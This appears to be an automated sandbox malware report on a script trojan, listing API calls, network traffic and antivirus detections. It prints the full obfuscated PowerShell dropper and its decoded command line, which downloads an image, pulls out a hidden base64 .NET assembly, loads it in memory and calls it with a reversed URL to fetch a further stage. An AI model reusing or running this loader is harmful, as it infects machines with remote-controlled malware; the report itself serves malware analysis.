⇵7⁂⇵CQ⁂⇵dwBl⁂⇵GI⁂⇵QwBs⁂⇵Gk⁂⇵ZQBu⁂⇵HQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵TgBl⁂⇵Hc⁂⇵LQBP⁂⇵GI⁂⇵agBl⁂⇵GM⁂⇵d⁂⇵⁂⇵g⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵TgBl⁂⇵HQ⁂⇵LgBX⁂⇵GU⁂⇵YgBD⁂⇵Gw⁂⇵aQBl⁂⇵G4⁂⇵d⁂⇵⁂⇵7⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Hc⁂⇵ZQBi⁂⇵EM⁂⇵b⁂⇵Bp⁂⇵GU⁂⇵bgB0⁂⇵C4⁂⇵R⁂⇵Bv⁂⇵Hc⁂⇵bgBs⁂⇵G8⁂⇵YQBk⁂⇵EQ⁂⇵YQB0⁂⇵GE⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBV⁂⇵HI⁂⇵b⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵EU⁂⇵bgBj⁂⇵G8⁂⇵Z⁂⇵Bp⁂⇵G4⁂⇵ZwBd⁂⇵Do⁂⇵OgBV⁂⇵FQ⁂⇵Rg⁂⇵4⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵UwB0⁂⇵HI⁂⇵aQBu⁂⇵Gc⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBC⁂⇵Hk⁂⇵d⁂⇵Bl⁂⇵HM⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBT⁂⇵FQ⁂⇵QQBS⁂⇵FQ⁂⇵Pg⁂⇵+⁂⇵Cc⁂⇵Ow⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBF⁂⇵E4⁂⇵R⁂⇵⁂⇵+⁂⇵D4⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C4⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵E8⁂⇵Zg⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵ZQBu⁂⇵GQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵TwBm⁂⇵Cg⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BG⁂⇵Gw⁂⇵YQBn⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵HM⁂⇵d⁂⇵Bh⁂⇵HI⁂⇵d⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵ZQ⁂⇵g⁂⇵D⁂⇵⁂⇵I⁂⇵⁂⇵t⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵d⁂⇵⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵Cs⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵LgBM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵7⁂⇵CQ⁂⇵YgBh⁂⇵HM⁂⇵ZQ⁂⇵2⁂⇵DQ⁂⇵T⁂⇵Bl⁂⇵G4⁂⇵ZwB0⁂⇵Gg⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Ds⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBT⁂⇵HU⁂⇵YgBz⁂⇵HQ⁂⇵cgBp⁂⇵G4⁂⇵Zw⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵s⁂⇵C⁂⇵⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵QwBv⁂⇵G4⁂⇵dgBl⁂⇵HI⁂⇵d⁂⇵Bd⁂⇵Do⁂⇵OgBG⁂⇵HI⁂⇵bwBt⁂⇵EI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵FM⁂⇵d⁂⇵By⁂⇵Gk⁂⇵bgBn⁂⇵Cg⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵ZQBk⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQ⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵UgBl⁂⇵GY⁂⇵b⁂⇵Bl⁂⇵GM⁂⇵d⁂⇵Bp⁂⇵G8⁂⇵bg⁂⇵u⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQBd⁂⇵Do⁂⇵OgBM⁂⇵G8⁂⇵YQBk⁂⇵Cg⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵B0⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵b⁂⇵Bv⁂⇵GE⁂⇵Z⁂⇵Bl⁂⇵GQ⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵V⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵o⁂⇵Cc⁂⇵RgBp⁂⇵GI⁂⇵ZQBy⁂⇵C4⁂⇵S⁂⇵Bv⁂⇵G0⁂⇵ZQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵d⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵u⁂⇵Ec⁂⇵ZQB0⁂⇵E0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵Cg⁂⇵JwBW⁂⇵EE⁂⇵SQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵GE⁂⇵cgBn⁂⇵HU⁂⇵bQBl⁂⇵G4⁂⇵d⁂⇵Bz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Cw⁂⇵K⁂⇵⁂⇵n⁂⇵HQ⁂⇵e⁂⇵B0⁂⇵C4⁂⇵S⁂⇵BC⁂⇵C8⁂⇵QQBU⁂⇵FM⁂⇵V⁂⇵⁂⇵v⁂⇵DQ⁂⇵Lg⁂⇵1⁂⇵Dc⁂⇵MQ⁂⇵u⁂⇵D⁂⇵⁂⇵MQ⁂⇵y⁂⇵C4⁂⇵Mg⁂⇵5⁂⇵DE⁂⇵Lw⁂⇵v⁂⇵Do⁂⇵c⁂⇵B0⁂⇵HQ⁂⇵a⁂⇵⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C4⁂⇵SQBu⁂⇵HY⁂⇵bwBr⁂⇵GU⁂⇵K⁂⇵⁂⇵k⁂⇵G4⁂⇵dQBs⁂⇵Gw⁂⇵L⁂⇵⁂⇵g⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵KQ⁂⇵=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂⇵','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 2852
thread_handle: 0x00000448
process_identifier: 2848
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.HB/ATST/4.571.012.291//:ptth');$method.Invoke($null, $arguments)"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000044c
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [
Data received Wdçð‚$Xt©#žÃ»Tk [ÜUvDOWNGRD è8^=•ro}°ÒÎ1—Ïî(rỏž¼ðÏt‚À ÿ 
Data received P
Data received “
Data received Aµ³Ë¦!?fBªì>#q 2íÏæ·¢áq¯öUd|¨^ægãÄ'“Ž¬[çw²Ì(þÝ$хú- ʗY]wH0F!êºÎ —þžA.Mü¶Ÿ •1€×ìÔé2¤Š¡9"!ù/®ßXª`²bí:ËEj2Dt þÕwnˆä‘˜÷›ôØ
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received å «Eæjíô[k¼Js\’@Øm`¡_· EÉ?ø½¡u«ÿ[\Ð'“a¿ð7+†
Data sent yudçð™ªQ~ûMN»æ»ž>ùê<ƒž—¯Ã­ùÑcJd2/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
Data sent FBA`­8—àŽ¨FïD“¤“"å ?!QáàVŠ"ø}€‚/CbîâÖ>ÆR½:֘2¦gmÕ»q`Ô"CàνpóÁ0! ¶©5SZ x½SK›«ñî.*°X[ΣT›lí.®.x•V‡íÓ
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
FireEye VB:Trojan.Valyria.8426
Cyren VBS/Agent.BDD
Symantec Scr.Malcode!gen102
Kaspersky HEUR:Trojan.Script.Generic
BitDefender VB:Trojan.Valyria.8426
NANO-Antivirus Trojan.Script.Hworm.dmiour
MicroWorld-eScan VB:Trojan.Valyria.8426
VIPRE VB:Trojan.Valyria.8426
Emsisoft VB:Trojan.Valyria.8426 (B)
MAX malware (ai score=84)
GData VB:Trojan.Valyria.8426
Google Detected
Time & API Arguments Status Return Repeated

send

buffer: yudçð™ªQ~ûMN»æ»ž>ùê<ƒž—¯Ã­ùÑcJd2/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
socket: 1436
sent: 126
1 126 0

send

buffer: FBA`­8—àŽ¨FïD“¤“"å ?!QáàVŠ"ø}€‚/CbîâÖ>ÆR½:֘2¦gmÕ»q`Ô"CàνpóÁ0! ¶©5SZ x½SK›«ñî.*°X[ΣT›lí.®.x•V‡íÓ
socket: 1436
sent: 134
1 134 0

WSASend

buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 2024
0 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵VQBy⁂⇵Gw⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵JwBo⁂⇵HQ⁂⇵d⁂⇵Bw⁂⇵HM⁂⇵Og⁂⇵v⁂⇵C8⁂⇵dQBw⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵Z⁂⇵Bl⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBu⁂⇵HM⁂⇵LgBj⁂⇵G8⁂⇵bQ⁂⇵u⁂⇵GI⁂⇵cg⁂⇵v⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBz⁂⇵C8⁂⇵M⁂⇵⁂⇵w⁂⇵DQ⁂⇵Lw⁂⇵1⁂⇵DU⁂⇵OQ⁂⇵v⁂⇵DU⁂⇵MQ⁂⇵w⁂⇵C8⁂⇵bwBy⁂⇵Gk⁂⇵ZwBp⁂⇵G4⁂⇵YQBs⁂⇵C8⁂⇵cgB1⁂⇵G0⁂⇵c⁂⇵Bf⁂⇵H⁂⇵⁂⇵cgBp⁂⇵HY⁂⇵YQB0⁂⇵GU⁂⇵LgBq⁂⇵H⁂⇵⁂⇵Zw⁂⇵/⁂⇵DE⁂⇵Ng⁂⇵5⁂⇵D⁂⇵⁂⇵NQ⁂⇵w⁂⇵DQ⁂⇵MQ⁂⇵y⁂⇵Dk⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵dwBl⁂⇵GI⁂⇵QwBs⁂⇵Gk⁂⇵ZQBu⁂⇵HQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵TgBl⁂⇵Hc⁂⇵LQBP⁂⇵GI⁂⇵agBl⁂⇵GM⁂⇵d⁂⇵⁂⇵g⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵TgBl⁂⇵HQ⁂⇵LgBX⁂⇵GU⁂⇵YgBD⁂⇵Gw⁂⇵aQBl⁂⇵G4⁂⇵d⁂⇵⁂⇵7⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Hc⁂⇵ZQBi⁂⇵EM⁂⇵b⁂⇵Bp⁂⇵GU⁂⇵bgB0⁂⇵C4⁂⇵R⁂⇵Bv⁂⇵Hc⁂⇵bgBs⁂⇵G8⁂⇵YQBk⁂⇵EQ⁂⇵YQB0⁂⇵GE⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBV⁂⇵HI⁂⇵b⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵EU⁂⇵bgBj⁂⇵G8⁂⇵Z⁂⇵Bp⁂⇵G4⁂⇵ZwBd⁂⇵Do⁂⇵OgBV⁂⇵FQ⁂⇵Rg⁂⇵4⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵UwB0⁂⇵HI⁂⇵aQBu⁂⇵Gc⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBC⁂⇵Hk⁂⇵d⁂⇵Bl⁂⇵HM⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBT⁂⇵FQ⁂⇵QQBS⁂⇵FQ⁂⇵Pg⁂⇵+⁂⇵Cc⁂⇵Ow⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBF⁂⇵E4⁂⇵R⁂⇵⁂⇵+⁂⇵D4⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C4⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵E8⁂⇵Zg⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵ZQBu⁂⇵GQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵TwBm⁂⇵Cg⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BG⁂⇵Gw⁂⇵YQBn⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵HM⁂⇵d⁂⇵Bh⁂⇵HI⁂⇵d⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵ZQ⁂⇵g⁂⇵D⁂⇵⁂⇵I⁂⇵⁂⇵t⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵d⁂⇵⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵Cs⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵LgBM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵7⁂⇵CQ⁂⇵YgBh⁂⇵HM⁂⇵ZQ⁂⇵2⁂⇵DQ⁂⇵T⁂⇵Bl⁂⇵G4⁂⇵ZwB0⁂⇵Gg⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Ds⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBT⁂⇵HU⁂⇵YgBz⁂⇵HQ⁂⇵cgBp⁂⇵G4⁂⇵Zw⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵s⁂⇵C⁂⇵⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵QwBv⁂⇵G4⁂⇵dgBl⁂⇵HI⁂⇵d⁂⇵Bd⁂⇵Do⁂⇵OgBG⁂⇵HI⁂⇵bwBt⁂⇵EI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵FM⁂⇵d⁂⇵By⁂⇵Gk⁂⇵bgBn⁂⇵Cg⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵ZQBk⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQ⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵UgBl⁂⇵GY⁂⇵b⁂⇵Bl⁂⇵GM⁂⇵d⁂⇵Bp⁂⇵G8⁂⇵bg⁂⇵u⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQBd⁂⇵Do⁂⇵OgBM⁂⇵G8⁂⇵YQBk⁂⇵Cg⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵B0⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵b⁂⇵Bv⁂⇵GE⁂⇵Z⁂⇵Bl⁂⇵GQ⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵V⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵o⁂⇵Cc⁂⇵RgBp⁂⇵GI⁂⇵ZQBy⁂⇵C4⁂⇵S⁂⇵Bv⁂⇵G0⁂⇵ZQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵d⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵u⁂⇵Ec⁂⇵ZQB0⁂⇵E0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵Cg⁂⇵JwBW⁂⇵EE⁂⇵SQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵GE⁂⇵cgBn⁂⇵HU⁂⇵bQBl⁂⇵G4⁂⇵d⁂⇵Bz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Cw⁂⇵K⁂⇵⁂⇵n⁂⇵HQ⁂⇵e⁂⇵B0⁂⇵C4⁂⇵S⁂⇵BC⁂⇵C8⁂⇵QQBU⁂⇵FM⁂⇵V⁂⇵⁂⇵v⁂⇵DQ⁂⇵Lg⁂⇵1⁂⇵Dc⁂⇵MQ⁂⇵u⁂⇵D⁂⇵⁂⇵MQ⁂⇵y⁂⇵C4⁂⇵Mg⁂⇵5⁂⇵DE⁂⇵Lw⁂⇵v⁂⇵Do⁂⇵c⁂⇵B0⁂⇵HQ⁂⇵a⁂⇵⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C4⁂⇵SQBu⁂⇵HY⁂⇵bwBr⁂⇵GU⁂⇵K⁂⇵⁂⇵k⁂⇵G4⁂⇵dQBs⁂⇵Gw⁂⇵L⁂⇵⁂⇵g⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵KQ⁂⇵=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂⇵','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
